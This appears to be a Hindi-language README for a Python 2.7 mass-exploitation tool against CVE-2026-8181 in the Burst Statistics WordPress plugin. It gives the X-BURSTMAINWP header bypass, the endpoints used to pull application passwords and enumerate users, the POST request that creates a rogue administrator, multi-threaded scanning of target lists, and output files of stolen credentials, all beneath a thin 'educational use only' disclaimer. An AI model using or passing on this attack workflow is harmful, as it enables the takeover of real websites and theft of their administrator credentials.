
CVE-2026-8181: बर्स्ट स्टैटिस्टिक्स ऑथ बाईपास → REST API अधिग्रहण और व्यवस्थापक निर्माण। पायथन 2.7। केवल शैक्षिक उपयोग।
Python 2.7 शोषण Burst Statistics प्लगइन भेद्यता (CVE-2026-8181) के लिए जो अप्रमाणित हमलावरों को REST API प्रमाणीकरण को बायपास करने, एप्लिकेशन पासवर्ड प्राप्त करने और कमजोर WordPress साइटों पर नए प्रशासक उपयोगकर्ता बनाने की अनुमति देता है।
⚠️ अस्वीकरण
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। केवल उन वेबसाइटों पर उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण की स्पष्ट अनुमति है। अधिक अस्वीकरण आप Jenderal92 के कवर पर देख सकते हैं। आप इसे यहां !!! देख सकते हैं।
CVE-2026-8181 WordPress के लिए Burst Statistics प्लगइन (पैच से पहले के संस्करणों) को प्रभावित करता है। दोष REST API प्रमाणीकरण तंत्र में है, जो एक हमलावर को अनुमति देता है:
X-BURSTMAINWP हेडर भेजकर प्रमाणीकरण बायपास करना/burst/v1/mainwp-auth एंडपॉइंट के माध्यम से एप्लिकेशन पासवर्ड प्राप्त करना/, /wordpress, )/wp/wp-json/wp/v2/users या लेखक आईडी रीडायरेक्ट के माध्यम से उपयोगकर्ता नाम गणनाres_login.txt – संक्षिप्त, पाइप‑पृथक REST API क्रेडेंशियल्स (पार्स/आयात करने में आसान)full_res_login.txt – पूर्ण मानव‑पठनीय रिपोर्ट जिसमें एक्सेस सत्यापन और एप्लिकेशन पासवर्ड शामिल हैंrequests लाइब्रेरीpip install requests
एक लक्ष्य सूची फ़ाइल तैयार करें (प्रति पंक्ति एक डोमेन या IP, http:///https:// के साथ या बिना)।
उदाहरण targets.txt:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
शोषण चलाएँ:
python2 CVE-2026-8181.py targets.txt
res_login.txt – REST API क्रेडेंशियल्स (प्रति कमजोर लक्ष्य एक पंक्ति)full_res_login.txt – विस्तृत रिपोर्ट| तर्क | विवरण |
|---|---|
list.txt | लक्ष्य URL वाली फ़ाइल का पथ |
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] कुल लक्ष्य: 2
[*] थ्रेड: 10
[*] आधार पथ: ['', '/wordpress', '/wp']
[*] स्कैनिंग: example.com
पथ पर प्रयास: /
उपयोगकर्ता नाम का पता चला: admin
[+] कमजोर! REST API बायपास सफल
[+] एप्लिकेशन पासवर्ड प्राप्त हुआ!
[+] उपयोगकर्ता नाम: admin
[+] ऐप पासवर्ड: xxxx xxxx xxxx
[+] Base64 टोकन: YWRtaW46eHh4eA==
[+] पहुंच की पुष्टि: WordPress सेटिंग्स
[+] पहुंच की पुष्टि: स्थापित प्लगइन्स
[+] पहुंच की पुष्टि: व्यवस्थापक उपयोगकर्ता
[+] REST API के माध्यम से व्यवस्थापक उपयोगकर्ता बनाया गया: wp_abc123
[+] परिणाम res_login.txt और full_res_login.txt में सहेजे गए
res_login.txt – संक्षिप्त REST API क्रेडेंशियल्सप्रत्येक पंक्ति इस पाइप‑पृथक प्रारूप का अनुसरण करती है:
लक्ष्य|उपयोगकर्ता नाम|पासवर्ड|ईमेल|उपयोगकर्ता आईडी
उदाहरण:
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
यह प्रारूप इसके लिए आदर्श है:
cut, grep, या Excel के साथ त्वरित निरीक्षणfull_res_login.txt – पूर्ण विस्तृत रिपोर्टप्रत्येक कमजोर लक्ष्य के लिए, स्क्रिप्ट एक मानव‑पठनीय ब्लॉक जोड़ती है:
============================================================
लक्ष्य: http://example.com
============================================================
[+] पहुंच सत्यापन:
[+] WordPress सेटिंग्स
[+] स्थापित प्लगइन्स
[+] व्यवस्थापक उपयोगकर्ता
[+] REST API क्रेडेंशियल्स:
उपयोगकर्ता नाम: wp_abc123
पासवर्ड: random12char
ईमेल: [email protected]
उपयोगकर्ता आईडी: 42
URL: http://example.com/wp-admin/
नोट: X-BURSTMAINWP हेडर के साथ उपयोग करें
[+] एप्लिकेशन पासवर्ड:
उपयोगकर्ता नाम: admin
ऐप पासवर्ड: xxxx xxxx xxxx
Base64 टोकन: YWRtaW46eHh4eA==
नोट: यदि एप्लिकेशन पासवर्ड एंडपॉइंट उपलब्ध नहीं है या कोई टोकन नहीं लौटाता है, तो वह अनुभाग
FAILEDदिखाएगा।
http:// उपसर्ग गायब है तो जोड़ता है, अंतिम स्लैश हटाता है।/, /wordpress, और /wp आज़माता है।/wp-json/wp/v2/users लाता है या ?author=N रीडायरेक्ट का उपयोग करता है।CVE-2026-8181) के साथ X-BURSTMAINWP: 1 + मूल प्रमाणीकरण भेजता है। यदि एंडपॉइंट /wp-json/wp/v2/users/me?context=edit 200 लौटाता है, तो साइट कमजोर है।/wp-json/burst/v1/mainwp-auth का अनुरोध करता है।/settings, /plugins, /users तक पहुंच सत्यापित करता है।POST /wp-json/wp/v2/users के माध्यम से एक नया व्यवस्थापक खाता बनाता है।res_login.txt में और पूर्ण विवरण full_res_login.txt में लिखता है।आप स्क्रिप्ट के अंदर इन वेरिएबल्स को संशोधित कर सकते हैं:
THREADS – समवर्ती थ्रेड की संख्या (डिफ़ॉल्ट 10)BASE_PATHS – जाँचने के लिए अतिरिक्त WordPress उपनिर्देशिकाएँrequests टाइमआउट मानयह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। अपने जोखिम पर उपयोग करें।